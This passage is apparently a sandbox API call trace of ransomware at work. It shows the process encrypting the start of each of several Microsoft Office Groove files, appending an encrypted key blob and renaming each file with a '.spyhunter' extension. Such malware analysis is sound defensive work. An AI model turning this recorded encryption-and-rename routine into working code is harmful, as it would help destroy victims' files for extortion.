office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\unformattednumeric.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0107.845] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\UnformattedNumeric.jpg") returned 125 [0107.845] StrStrW (lpFirst="UnformattedNumeric.jpg", lpSrch=".txt") returned 0x0 [0107.845] GetProcessHeap () returned 0x2c0000 [0107.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0107.845] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f7dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f7dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.891] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.891] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f7dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f7dc*=0x2800, lpOverlapped=0x0) returned 1 [0107.891] GetProcessHeap () returned 0x2c0000 [0107.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0107.891] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.891] WriteFile (in: hFile=0x178, lpBuffer=0x270f81c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f7dc, lpOverlapped=0x0 | out: lpBuffer=0x270f81c*, lpNumberOfBytesWritten=0x270f7dc*=0x4, lpOverlapped=0x0) returned 1 [0107.891] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f7dc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f7dc*=0x30, lpOverlapped=0x0) returned 1 [0107.891] CloseHandle (hObject=0x178) returned 1 [0107.892] GetProcessHeap () returned 0x2c0000 [0107.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ce0318 [0107.892] wnsprintfW (in: pszDest=0x2ce0318, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\UnformattedNumeric.jpg.spyhunter") returned 135 [0107.892] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\UnformattedNumeric.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\unformattednumeric.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\UnformattedNumeric.jpg.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\unformattednumeric.jpg.spyhunter")) returned 1 [0107.893] GetProcessHeap () returned 0x2c0000 [0107.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce0318 | out: hHeap=0x2c0000) returned 1 [0107.893] GetProcessHeap () returned 0x2c0000 [0107.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0107.893] GetProcessHeap () returned 0x2c0000 [0107.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa638 | out: hHeap=0x2c0000) returned 1 [0107.893] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f820 | out: pbBuffer=0x270f820) returned 1 [0107.893] GetProcessHeap () returned 0x2c0000 [0107.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0107.893] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f818*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f818*=0x30) returned 1 [0107.893] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\viewDblClick.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\viewdblclick.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0107.894] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\viewDblClick.js") returned 101 [0107.894] StrStrW (lpFirst="viewDblClick.js", lpSrch=".txt") returned 0x0 [0107.894] GetProcessHeap () returned 0x2c0000 [0107.894] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0107.894] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f7dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f7dc*=0x54, lpOverlapped=0x0) returned 1 [0107.895] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffffac, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.895] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x54, lpNumberOfBytesWritten=0x270f7dc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f7dc*=0x54, lpOverlapped=0x0) returned 1 [0107.895] GetProcessHeap () returned 0x2c0000 [0107.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0107.895] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.895] WriteFile (in: hFile=0x178, lpBuffer=0x270f81c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f7dc, lpOverlapped=0x0 | out: lpBuffer=0x270f81c*, lpNumberOfBytesWritten=0x270f7dc*=0x4, lpOverlapped=0x0) returned 1 [0107.895] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f7dc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f7dc*=0x30, lpOverlapped=0x0) returned 1 [0107.896] CloseHandle (hObject=0x178) returned 1 [0107.896] GetProcessHeap () returned 0x2c0000 [0107.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ce0318 [0107.896] wnsprintfW (in: pszDest=0x2ce0318, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\viewDblClick.js.spyhunter") returned 111 [0107.896] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\viewDblClick.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\viewdblclick.js"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\viewDblClick.js.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\viewdblclick.js.spyhunter")) returned 1 [0107.897] GetProcessHeap () returned 0x2c0000 [0107.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce0318 | out: hHeap=0x2c0000) returned 1 [0107.897] GetProcessHeap () returned 0x2c0000 [0107.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0107.898] GetProcessHeap () returned 0x2c0000 [0107.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cdf910 | out: hHeap=0x2c0000) returned 1 [0107.898] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f818 | out: pbBuffer=0x270f818) returned 1 [0107.898] GetProcessHeap () returned 0x2c0000 [0107.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0107.898] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f810*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f810*=0x30) returned 1 [0107.898] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\VIEWBY.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\viewby.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0107.903] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\VIEWBY.GIF") returned 96 [0107.903] StrStrW (lpFirst="VIEWBY.GIF", lpSrch=".txt") returned 0x0 [0107.903] GetProcessHeap () returned 0x2c0000 [0107.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0107.903] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f7d4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f7d4*=0x207, lpOverlapped=0x0) returned 1 [0107.904] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffdf9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.904] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x207, lpNumberOfBytesWritten=0x270f7d4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f7d4*=0x207, lpOverlapped=0x0) returned 1 [0107.904] GetProcessHeap () returned 0x2c0000 [0107.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0107.904] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.904] WriteFile (in: hFile=0x178, lpBuffer=0x270f814*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f7d4, lpOverlapped=0x0 | out: lpBuffer=0x270f814*, lpNumberOfBytesWritten=0x270f7d4*=0x4, lpOverlapped=0x0) returned 1 [0107.905] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f7d4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f7d4*=0x30, lpOverlapped=0x0) returned 1 [0107.905] CloseHandle (hObject=0x178) returned 1 [0107.905] GetProcessHeap () returned 0x2c0000 [0107.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ce0318 [0107.905] wnsprintfW (in: pszDest=0x2ce0318, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\VIEWBY.GIF.spyhunter") returned 106 [0107.905] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\VIEWBY.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\viewby.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\VIEWBY.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\viewby.gif.spyhunter")) returned 1 [0107.906] GetProcessHeap () returned 0x2c0000 [0107.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce0318 | out: hHeap=0x2c0000) returned 1 [0107.906] GetProcessHeap () returned 0x2c0000 [0107.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0107.906] GetProcessHeap () returned 0x2c0000 [0107.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cdf7f8 | out: hHeap=0x2c0000) returned 1 [0107.906] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f818 | out: pbBuffer=0x270f818) returned 1 [0107.906] GetProcessHeap () returned 0x2c0000 [0107.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0107.906] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f810*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f810*=0x30) returned 1 [0107.906] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\VIEW.JS" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\view.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0107.907] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\VIEW.JS") returned 93 [0107.907] StrStrW (lpFirst="VIEW.JS", lpSrch=".txt") returned 0x0 [0107.907] GetProcessHeap () returned 0x2c0000 [0107.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0107.907] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f7d4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f7d4*=0x2800, lpOverlapped=0x0) returned 1 [0108.196] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0108.196] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f7d4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f7d4*=0x2800, lpOverlapped=0x0) returned 1 [0108.197] GetProcessHeap () returned 0x2c0000 [0108.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0108.197] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0108.197] WriteFile (in: hFile=0x178, lpBuffer=0x270f814*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f7d4, lpOverlapped=0x0 | out: lpBuffer=0x270f814*, lpNumberOfBytesWritten=0x270f7d4*=0x4, lpOverlapped=0x0) returned 1 [0108.197] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f7d4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f7d4*=0x30, lpOverlapped=0x0) returned 1 [0108.197] CloseHandle (hObject=0x178) returned 1 [0108.197] GetProcessHeap () returned 0x2c0000 [0108.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ce0318 [0108.197] wnsprintfW (in: pszDest=0x2ce0318, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\VIEW.JS.spyhunter") returned 103 [0108.197] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\VIEW.JS" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\view.js"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\VIEW.JS.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\view.js.spyhunter")) returned 1 [0108.267] GetProcessHeap () returned 0x2c0000 [0108.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce0318 | out: hHeap=0x2c0000) returned 1 [0108.267] GetProcessHeap () returned 0x2c0000 [0108.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0108.267] GetProcessHeap () returned 0x2c0000 [0108.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b8ed8 | out: hHeap=0x2c0000) returned 1 [0108.300] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f810 | out: pbBuffer=0x270f810) returned 1 [0108.300] GetProcessHeap () returned 0x2c0000 [0108.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0108.300] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f808*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f808*=0x30) returned 1 [0108.300] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\SUBMIT.JS" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\submit.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0108.329] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\SUBMIT.JS") returned 96 [0108.329] StrStrW (lpFirst="SUBMIT.JS", lpSrch=".txt") returned 0x0 [0108.329] GetProcessHeap () returned 0x2c0000 [0108.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0108.329] ReadFile (in: hFile=0x17c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f7cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f7cc*=0x2800, lpOverlapped=0x0) returned 1 [0108.331] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0108.331] WriteFile (in: hFile=0x17c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f7cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f7cc*=0x2800, lpOverlapped=0x0) returned 1 [0108.331] GetProcessHeap () returned 0x2c0000 [0108.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0108.331] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0108.331] WriteFile (in: hFile=0x17c, lpBuffer=0x270f80c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f7cc, lpOverlapped=0x0 | out: lpBuffer=0x270f80c*, lpNumberOfBytesWritten=0x270f7cc*=0x4, lpOverlapped=0x0) returned 1 [0108.422] WriteFile (in: hFile=0x17c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f7cc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f7cc*=0x30, lpOverlapped=0x0) returned 1 [0108.423] CloseHandle (hObject=0x17c) returned 1 [0108.434] GetProcessHeap () returned 0x2c0000 [0108.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0108.435] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\SUBMIT.JS.spyhunter") returned 106 [0108.435] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\SUBMIT.JS" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\submit.js"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\SUBMIT.JS.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\submit.js.spyhunter")) returned 1 [0108.450] GetProcessHeap () returned 0x2c0000 [0108.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0108.450] GetProcessHeap () returned 0x2c0000 [0108.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0108.450] GetProcessHeap () returned 0x2c0000 [0108.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf51b0 | out: hHeap=0x2c0000) returned 1 [0108.450] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f808 | out: pbBuffer=0x270f808) returned 1 [0108.450] GetProcessHeap () returned 0x2c0000 [0108.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0108.450] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f800*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f800*=0x30) returned 1 [0108.451] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsBlankPage.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsblankpage.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0108.512] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsBlankPage.html") returned 106 [0108.512] StrStrW (lpFirst="FormsBlankPage.html", lpSrch=".txt") returned 0x0 [0108.512] GetProcessHeap () returned 0x2c0000 [0108.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0108.512] ReadFile (in: hFile=0xb4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f7c4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f7c4*=0x45f, lpOverlapped=0x0) returned 1 [0109.147] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffba1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.147] WriteFile (in: hFile=0xb4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x45f, lpNumberOfBytesWritten=0x270f7c4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f7c4*=0x45f, lpOverlapped=0x0) returned 1 [0109.147] GetProcessHeap () returned 0x2c0000 [0109.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0109.147] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.147] WriteFile (in: hFile=0xb4, lpBuffer=0x270f804*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f7c4, lpOverlapped=0x0 | out: lpBuffer=0x270f804*, lpNumberOfBytesWritten=0x270f7c4*=0x4, lpOverlapped=0x0) returned 1 [0109.148] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f7c4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f7c4*=0x30, lpOverlapped=0x0) returned 1 [0109.148] CloseHandle (hObject=0xb4) returned 1 [0109.148] GetProcessHeap () returned 0x2c0000 [0109.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e016b0 [0109.148] wnsprintfW (in: pszDest=0x2e016b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsBlankPage.html.spyhunter") returned 116 [0109.148] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsBlankPage.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsblankpage.html"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsBlankPage.html.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsblankpage.html.spyhunter")) returned 1 [0109.149] GetProcessHeap () returned 0x2c0000 [0109.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e016b0 | out: hHeap=0x2c0000) returned 1 [0109.149] GetProcessHeap () returned 0x2c0000 [0109.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0109.149] GetProcessHeap () returned 0x2c0000 [0109.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31aa38 | out: hHeap=0x2c0000) returned 1 [0109.149] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f808 | out: pbBuffer=0x270f808) returned 1 [0109.149] GetProcessHeap () returned 0x2c0000 [0109.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0109.149] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f800*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f800*=0x30) returned 1 [0109.149] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsHomePageStyle.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formshomepagestyle.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0109.150] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsHomePageStyle.css") returned 109 [0109.150] StrStrW (lpFirst="FormsHomePageStyle.css", lpSrch=".txt") returned 0x0 